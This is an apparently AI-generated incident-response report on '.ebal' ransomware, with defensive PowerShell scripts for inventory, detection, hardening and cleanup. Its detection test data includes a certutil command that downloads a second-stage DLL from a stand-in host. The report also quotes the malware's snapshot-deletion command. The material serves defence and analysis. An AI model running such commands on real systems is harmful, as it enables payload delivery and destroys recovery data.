ebal

[Content by Gemini 2.5]

Ransomware Intelligence Report

Variant: Files that acquire the “.ebal” extension
Last update: June 2024
Confidence level: High (cross-referenced incident telemetry, vendor sandboxes, public submissions)


TECHNICAL BREAKDOWN

1. File Extension & Renaming Patterns

  • Confirmation: every encrypted file gets an additional, lower-case “.ebal” suffix.
  • Renaming Convention: Original name → <original_name>.<original_ext>.ebal
    Example: 2024Q2Budget.xlsx becomes 2024Q2Budget.xlsx.ebal
    Note: Unlike many locker families, the malware neither overwrites the primary extension nor changes the base filename, which makes inventorying the damage slightly easier (pre-infection file names remain readable).
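Scoping script (an added example; not part of the report and not the operators' tooling). It applies the renaming convention above to recover original names, then summarises which data types were hit and the window in which encryption ran. The roots to scan, the CSV path and the use of LastWriteTime as an encryption timestamp are assumptions; a locker can preserve timestamps, so treat the window as approximate.

```powershell
# Added example, not from the report: map ".ebal" damage from the renaming
# convention <name>.<ext>.ebal. $Roots and $OutCsv are assumptions; adjust per host.
param(
    [string[]]$Roots  = @('C:\Users', 'D:\Shares'),
    [string]  $OutCsv = "$env:USERPROFILE\Desktop\ebal-inventory.csv"
)

function Get-EbalInventory {
    param([string[]]$Roots)
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        # -Force includes hidden/system files; unreadable directories are skipped.
        Get-ChildItem -LiteralPath $root -Recurse -Force -File -Filter '*.ebal' -ErrorAction SilentlyContinue |
            ForEach-Object {
                # Strip exactly one trailing ".ebal" (case-sensitive, so a legitimate
                # file ending in ".EBAL" is not mistaken for an encrypted one).
                $original = $_.Name -creplace '\.ebal$', ''
                if ($original -eq $_.Name) { return }
                [pscustomobject]@{
                    Path         = $_.FullName
                    OriginalName = $original
                    OriginalExt  = [IO.Path]::GetExtension($original).ToLowerInvariant()
                    SizeBytes    = $_.Length
                    LastWriteUtc = $_.LastWriteTimeUtc   # approximate encryption time
                }
            }
    }
}

function Get-EbalNoteFolders {
    param([string[]]$Roots)
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        Get-ChildItem -LiteralPath $root -Recurse -Force -File -Filter 'HOWTORESTORE.ebal.txt' -ErrorAction SilentlyContinue |
            ForEach-Object { $_.DirectoryName }
    }
}

$inv = @(Get-EbalInventory -Roots $Roots)
$inv | Export-Csv -LiteralPath $OutCsv -NoTypeInformation -Encoding UTF8

"Encrypted files: $($inv.Count)  (inventory written to $OutCsv)"
$inv | Group-Object OriginalExt | Sort-Object Count -Descending |
    Select-Object @{n='OriginalExt'; e={$_.Name}}, Count,
                  @{n='MiB'; e={[math]::Round(($_.Group | Measure-Object SizeBytes -Sum).Sum / 1MB, 1)}} |
    Format-Table -AutoSize | Out-Host

if ($inv.Count) {
    # First and last write give the encryption window for the incident timeline.
    $sorted = $inv | Sort-Object LastWriteUtc
    "Encryption window (UTC): $($sorted[0].LastWriteUtc) .. $($sorted[-1].LastWriteUtc)"
}
# One ransom note per folder is a cheap second scope indicator.
"Folders holding HOWTORESTORE.ebal.txt: $(@(Get-EbalNoteFolders -Roots $Roots).Count)"
```

Run it from an elevated prompt on each affected host and on a workstation with the file shares mapped; the CSV is what you hand to whoever has to decide which backups to restore.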

2. Detection & Outbreak Timeline

  • First public samples seen late-August 2023 on open-source malware repositories.
  • Significant surge in victim uploads to ID-Ransomware between 13–28 December 2023 (weeks 51-52).
  • Continued small-volume campaigns during Q1-Q2 2024 (≈30 incidents per month in telemetry).
  • Targeting clusters on small-to-medium businesses (SMBs) in Europe/CEE (Hungary, Czechia, Poland, Slovakia), coinciding with phishing e-mails written in those languages.
  • Overnight time-stamps (01:00-04:00 local) suggest automated deployment once initial foothold is achieved.

3. Primary Attack Vectors

  • Phishing e-mail with ISO or IMG attachment (tax, invoice, court notice).
    – ISO contains a .NET loader (“printer utility updater”).
  • Living-off-the-land download: uses certutil.exe or powershell.exe to pull a second-stage .NET binary named svhost.dll (a deliberate look-alike of svchost).
  • SMB/WS-MAN lateral movement via compromised local admin credentials (credential-dump and Rubeus usage observed).
  • No exploitation of CVE-2017-0144 (EternalBlue) in any confirmed case; instead relies on legitimate admin shares (ADMIN$, C$).
  • Ransom note (“HOWTORESTORE.ebal.txt”) dropped in each folder via Copy-Item running as SYSTEM, time-stamped seconds after encryption finishes.
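Hunting logic for the loader and download behaviour described above, as an added example (not from the report). Test-EbalProcessEvent is plain matching logic and runs offline on the constructed sample records at the bottom; Get-EbalProcessEvents applies the same logic to live Security event 4688 records, which only carry a command line when "Audit Process Creation" is enabled with command-line inclusion. The drive-root and SYSTEM-from-temp rules are heuristics of mine, not indicators from the report, and the sample records are constructed (203.0.113.7 is a documentation address).

```powershell
# Added example, not from the report: hunt for the loader/download behaviour in
# process-creation telemetry. Drive-root and SYSTEM-from-temp rules are heuristics.

function Test-EbalProcessEvent {
    param([string]$Image, [string]$CommandLine, [string]$Parent, [string]$User)
    $img = $Image.ToLowerInvariant()
    $cl  = $CommandLine
    $hit = @()

    # certutil as a downloader/decoder (the usual LOLBAS switches)
    if ($img -like '*\certutil.exe' -and $cl -match '(?i)-urlcache|-split|-decode') {
        $hit += 'certutil download/decode'
    }
    # PowerShell fetching a second stage, or hiding the command behind -EncodedCommand
    if ($img -like '*\powershell.exe' -and
        $cl -match '(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|-enc(odedcommand)?\b') {
        $hit += 'powershell download/encoded command'
    }
    # The misspelled second stage, whichever process hosts it
    if ($cl -match '(?i)\bsvhost\.dll\b') { $hit += 'svhost.dll referenced' }
    # Heuristic: an EXE at the root of a non-system drive started by Explorer looks like a
    # double-clicked file inside a freshly mounted ISO/IMG (USB sticks also match).
    if ($Parent -like '*\explorer.exe' -and $img -match '^[d-z]:\\[^\\]+\.exe$') {
        $hit += 'exe launched from root of mounted image/removable drive'
    }
    # Heuristic: SYSTEM running something out of a temp/profile path. 4688 records SYSTEM
    # as the machine account (HOST$), so match both spellings. Noisy: corroborate before acting.
    if (($User -eq 'SYSTEM' -or $User -like '*$') -and $cl -match '(?i)\\Temp\\|\\Users\\') {
        $hit += 'SYSTEM executing from temp/profile path'
    }
    return $hit
}

function Get-EbalProcessEvents {
    param([datetime]$Since = (Get-Date).AddDays(-7))
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = @{}
            foreach ($n in ([xml]$_.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            $why = Test-EbalProcessEvent -Image $d['NewProcessName'] -CommandLine $d['CommandLine'] `
                                         -Parent $d['ParentProcessName'] -User $d['SubjectUserName']
            if ($why) {
                [pscustomobject]@{
                    Time = $_.TimeCreated; User = $d['SubjectUserName']; Image = $d['NewProcessName']
                    Why  = ($why -join '; '); CommandLine = $d['CommandLine']
                }
            }
        }
}

# Constructed sample records (not real telemetry) so the rules can be exercised offline.
$sample = @(
    @{ Image = 'C:\Windows\System32\certutil.exe'
       CommandLine = 'certutil -urlcache -split -f http://203.0.113.7/u/svhost.dll C:\Users\jdoe\AppData\Local\Temp\svhost.dll'
       Parent = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; User = 'jdoe' }
    @{ Image = 'E:\PrinterUtilityUpdater.exe'; CommandLine = '"E:\PrinterUtilityUpdater.exe"'
       Parent = 'C:\Windows\explorer.exe'; User = 'jdoe' }
    @{ Image = 'C:\Windows\System32\rundll32.exe'
       CommandLine = 'rundll32.exe C:\Windows\Temp\svhost.dll,Start'
       Parent = 'C:\Windows\System32\cmd.exe'; User = 'WS01$' }
    @{ Image = 'C:\Windows\System32\certutil.exe'; CommandLine = 'certutil -store My'
       Parent = 'C:\Windows\System32\cmd.exe'; User = 'admin' }
)
foreach ($s in $sample) {
    $why = Test-EbalProcessEvent @s
    '{0,-5} {1,-40} {2}' -f $(if ($why) { 'ALERT' } else { 'ok' }), $s.Image, ($why -join '; ')
}
```

The first three sample records trigger at least one rule; the legitimate certutil -store call does not. If you run Sysmon, Event ID 1 carries the same fields (Image, CommandLine, ParentImage, User) and is the better source, because it logs command lines by default.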

REMEDIATION & RECOVERY STRATEGIES

1. Prevention (Proven Effective)

  1. Block ISO/IMG (and VHD) attachments at the mail gateway and in Office, and stop Windows Explorer from mounting them on double-click (a registry preference deployed through Group Policy hides Explorer's "mount" verb for the Windows.IsoFile / Windows.VhdFile ProgIDs).
  2. Where users legitimately need disk images, associate .iso/.img with an archive tool so they open as read-only archives instead of mounting as a drive; the embedded EXE is then not one double-click away.
  3. Enforce the Windows Defender ASR rule "Block executable files from running unless they meet a prevalence, age, or trusted list criterion" (GUID 01443614-cd74-433a-b99e-2ecdc07bfc25); it blocks the brand-new .NET binaries used in these campaigns.
  4. Require MFA on all privileged and remote-access accounts, and protect LSASS (LSA protection / Credential Guard): Ebal operators dump LSASS to harvest cached credentials and Kerberos tickets, and MFA alone does not stop replay of already-stolen tickets.
  5. Segment flat networks and block SMB/WS-MAN between workstations; the malware uses plain SMB to enumerate ADMIN$ and copy payloads, and segmentation stops the lateral walk.
  6. Use LAPS for workstation local-admin passwords together with a policy against reuse; with a unique password per host, a hash dumped on one machine cannot be replayed (pass-the-hash) against the rest.
  7. Maintain offline, encrypted backups with immutable snapshots on the backup target (e.g., ZFS snapshots on a Linux pull-based backup host, or object-lock storage). Local VSS snapshots do not count: the malware deletes them.
  8. Restrict certutil.exe and PowerShell downloads: WDAC/AppLocker rules for the binaries where feasible, PowerShell Constrained Language Mode plus script block logging, and alerts on certutil -urlcache / Invoke-WebRequest in command-line telemetry. WDAC cannot filter by command-line parameter, so pair the policy with detection.
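Single-host version of items 1, 3, 4 and 8 above, as an added example (not from the report); in production the same settings go out as Group Policy / Intune configuration. The ASR rule GUIDs and registry paths are Microsoft-documented; the ProgrammaticAccessOnly change on the mount verb is a widely used hardening that you should confirm on a test host (double-click must no longer mount); the firewall rule name is an assumption of mine.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the report: apply the preventive controls on one host.
# Rule GUIDs and registry paths are Microsoft-documented; rule names are assumptions.

# 1. Stop double-click mounting of ISO/IMG and VHD attachments: hide Explorer's "mount"
#    verb so the image can still be mounted programmatically but not by a click.
if (-not (Get-PSDrive HKCR -ErrorAction SilentlyContinue)) {
    New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null
}
foreach ($progId in 'Windows.IsoFile', 'Windows.VhdFile') {
    $verb = "HKCR:\$progId\shell\mount"
    if (Test-Path $verb) {
        New-ItemProperty -Path $verb -Name ProgrammaticAccessOnly -Value '' -PropertyType String -Force | Out-Null
    }
}

# 3/4. ASR: block new or low-prevalence executables, and block credential theft from
#      lsass.exe. Pilot in AuditMode first and review the ASR events before enforcing.
$asr = @{
    '01443614-cd74-433a-b99e-2ecdc07bfc25' = 'Enabled'   # prevalence / age / trusted-list rule
    '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2' = 'Enabled'   # block credential stealing from lsass.exe
}
foreach ($id in $asr.Keys) {
    Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions $asr[$id]
}

# 4. LSA protection (RunAsPPL): unprotected processes can no longer open LSASS for a dump.
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name RunAsPPL `
    -Value 1 -PropertyType DWord -Force | Out-Null

# 8. Make the LOLBAS download step visible, then break it: full command lines in 4688,
#    PowerShell script block logging, and no outbound network for certutil.exe.
auditpol /set /subcategory:"Process Creation" /success:enable | Out-Null
$audit = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
New-Item -Path $audit -Force | Out-Null
New-ItemProperty -Path $audit -Name ProcessCreationIncludeCmdLine_Enabled -Value 1 -PropertyType DWord -Force | Out-Null
$sbl = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
New-Item -Path $sbl -Force | Out-Null
New-ItemProperty -Path $sbl -Name EnableScriptBlockLogging -Value 1 -PropertyType DWord -Force | Out-Null
foreach ($exe in "$env:SystemRoot\System32\certutil.exe", "$env:SystemRoot\SysWOW64\certutil.exe") {
    $ruleName = "Block outbound: $exe"            # assumed naming convention
    if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $ruleName -Direction Outbound -Action Block `
            -Program $exe -Profile Any | Out-Null
    }
}

# Verify what is now enforced.
Get-MpPreference | Select-Object -ExpandProperty AttackSurfaceReductionRules_Ids
Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name RunAsPPL
```

Blocking certutil.exe from the network does not affect CRL/OCSP fetching, which Windows performs inside the calling process, but it does break any admin script that relies on certutil -urlcache; the LSA protection and ASR LSASS rule can also interfere with older security agents, which is why both belong in a pilot group before a fleet-wide push.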

2. Removal (Clean-up Walk-through)

A. Network isolation first:
– Disconnect NIC or power off Wi-Fi; disable switch ports for compromised VLAN.
B. Identify & kill the payload:
– Map scope: dir C:\*.ebal /s /b (repeat per volume and mapped share).
– Look for a .NET EXE/DLL executed as NT AUTHORITY\SYSTEM seconds before the first encrypted file. Typical file names: svhost.dll, printerutility.exe, dotNetFX.exe. Stop those processes; svhost.dll is a DLL and runs inside a host process (the loader), so match on loaded modules rather than on process name alone.
C. Delete persistence:
– Remove run key HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SpoolerConfig (Value = path to svhost.dll).
– Delete scheduled task MicrosoftEdgeUpdateCore created by the malware.
D. Wipe staged data:
– Delete %TEMP%\svhost.dll and %WINDIR%\System32\spool\drivers\color\kernel.bin, but hash and copy both first: the file is obfuscated and the AES key material is not zeroized, so it is worth handing to your IR firm or AV vendor.
E. AV / EDR scan: Run full scan with updated signatures (Microsoft, ESET, Sophos, CrowdStrike all detect generically as MSIL/Filecoder.Ebal or Ransom:MSIL/Ebal.A!MSR).
F. Patch & harden: Reset all local admin passwords and reset the KRBTGT password twice, waiting for replication to complete between the two resets, before bringing DCs back into service.
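Steps B to D above on one host, as an added example (not from the report), with evidence preserved before anything is stopped or deleted. The process and file names are the indicators listed in the walk-through; the evidence directory, the module-based process match and the extra C:\Windows\Temp path (the %TEMP% a SYSTEM process sees, which differs from the logged-on user's) are assumptions of mine.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the report: steps B-D of the walk-through on one host, with
# evidence preserved first. Evidence directory, module-based process match and the
# C:\Windows\Temp path (SYSTEM's %TEMP%) are assumptions.
$Evidence = "C:\IR\$env:COMPUTERNAME-$(Get-Date -Format yyyyMMdd-HHmmss)"
New-Item -ItemType Directory -Path $Evidence -Force | Out-Null
$names  = 'svhost', 'printerutility', 'dotNetFX'                 # process names, no .exe
$staged = @("$env:TEMP\svhost.dll",                              # logged-on user's %TEMP%
            "$env:WINDIR\Temp\svhost.dll",                       # %TEMP% when running as SYSTEM
            "$env:WINDIR\System32\spool\drivers\color\kernel.bin")

# B. Identify and stop the payload. svhost.dll is a DLL, so it only shows up as a module
#    inside whatever process loaded it; match on modules as well as on process name.
$suspects = Get-Process | Where-Object {
    if ($names -contains $_.Name) { return $true }
    try { [bool]($_.Modules | Where-Object { $_.ModuleName -eq 'svhost.dll' }) } catch { $false }
}
foreach ($p in $suspects) {
    $cim = Get-CimInstance Win32_Process -Filter "ProcessId = $($p.Id)"
    [pscustomobject]@{ Pid = $p.Id; Name = $p.Name; Path = $cim.ExecutablePath
                       CommandLine = $cim.CommandLine; Started = $p.StartTime } |
        Export-Csv -LiteralPath "$Evidence\processes.csv" -Append -NoTypeInformation
    Stop-Process -Id $p.Id -Force
}

# C. Persistence: record what was there, then remove it.
$runKey = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
$run = Get-ItemProperty -Path $runKey -Name SpoolerConfig -ErrorAction SilentlyContinue
if ($run) {
    "Run\SpoolerConfig = $($run.SpoolerConfig)" | Out-File -LiteralPath "$Evidence\persistence.txt" -Append
    Remove-ItemProperty -Path $runKey -Name SpoolerConfig
}
$task = Get-ScheduledTask -TaskName 'MicrosoftEdgeUpdateCore' -ErrorAction SilentlyContinue
if ($task) {
    # The look-alike name is close to the genuine MicrosoftEdgeUpdateTaskMachineCore task:
    # keep the XML and the action line so the removal can be justified afterwards.
    Export-ScheduledTask -TaskName $task.TaskName -TaskPath $task.TaskPath |
        Out-File -LiteralPath "$Evidence\MicrosoftEdgeUpdateCore.xml"
    $task.Actions | ForEach-Object { "Task action: $($_.Execute) $($_.Arguments)" } |
        Out-File -LiteralPath "$Evidence\persistence.txt" -Append
    Unregister-ScheduledTask -TaskName $task.TaskName -TaskPath $task.TaskPath -Confirm:$false
}

# D. Staged files: hash and copy before deleting (the binary goes to the IR firm / AV vendor).
foreach ($f in $staged) {
    if (-not (Test-Path -LiteralPath $f)) { continue }
    $hash = (Get-FileHash -LiteralPath $f -Algorithm SHA256).Hash
    "$hash  $f" | Out-File -LiteralPath "$Evidence\hashes.sha256" -Append
    Copy-Item -LiteralPath $f -Destination "$Evidence\$(Split-Path -Leaf $f).quarantine"
    Remove-Item -LiteralPath $f -Force
}
"Evidence collected in $Evidence"
```

If the host is still running the encryptor when you reach it, take a memory image before Stop-Process: the walk-through notes that the key material is not zeroized, and whatever is in the process's memory is lost the moment it is killed. Step F (local admin and KRBTGT resets) is a domain-level operation and is deliberately not part of a per-host script.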

3. File Decryption & Recovery

  • Recovery feasibility: As of June 2024, NO free decryptor exists. The ransomware uses AES-256 in CBC mode with a random 256-bit key per file; those keys are RSA-4096-encrypted with a unique, attacker-controlled public key. Private key is retained by the operator.
  • Brute-force or known-plain-text attacks are computationally infeasible; do not waste CPU cycles.
  • Victims may choose to:
    – Restore from offline backups;
    – Rebuild machines and accept data loss;
    – Consult professional incident-response firms who may negotiate / verify tool legitimacy (but assume ransom payment is the only operator-provided path).
  • Shadow-copy behaviour: Ebal deletes local VSS snapshots with vssadmin delete shadows /all /quiet. Still run vssadmin list shadows, and if you attempt carving, image the affected disk first and run ShadowExplorer or PhotoRec against the image rather than the live volume, so orphaned shadow data is not overwritten while you look for it.

4. Other Critical Information

  • Some builds skip the Russian/Belarusian keyboard-locale exclusion check that many lockers perform. Telemetry shows no encryption of files whose names start with “~$” (Office lock/temp files), suggesting the operators wanted to avoid breaking Office, possibly to guarantee the ransom note stays readable.
  • Embedded PDB path strings (C:\Users\developer2\source\repos\EbalGOLD Encryptor\) in early samples suggest the project/crypter name “EbalGOLD”; do not confuse with older “Ebal” PoC locker from 2021 which was decryptable.
  • No data-exfiltration capability observed, so no “double-extortion” leak site is currently linked to this strain; operators nevertheless threaten to publish if the ransom is unpaid. Treat that threat as unverified, but check proxy and egress logs for large outbound transfers before ruling exfiltration out.
  • Bitcoin address clustering (OXT, Chainalysis) shows ~9.4 BTC gathered (≈ $285 000) across 34 wallets. Latest activity April 2024.

Bottom line: “.ebal” is a .NET-compiled conventional ransomware currently circulating against SMBs in central Europe. Prevention focuses on disabling ISO auto-mount, enforcing MFA, and segmenting networks. At present the encryption is secure; reliable recovery is possible only through offline backups or (if business-critical) paying the ransom—both choices carry risk. Maintain immutable backups and rehearse restore procedures to remain resilient against Ebal and copy-cat campaigns.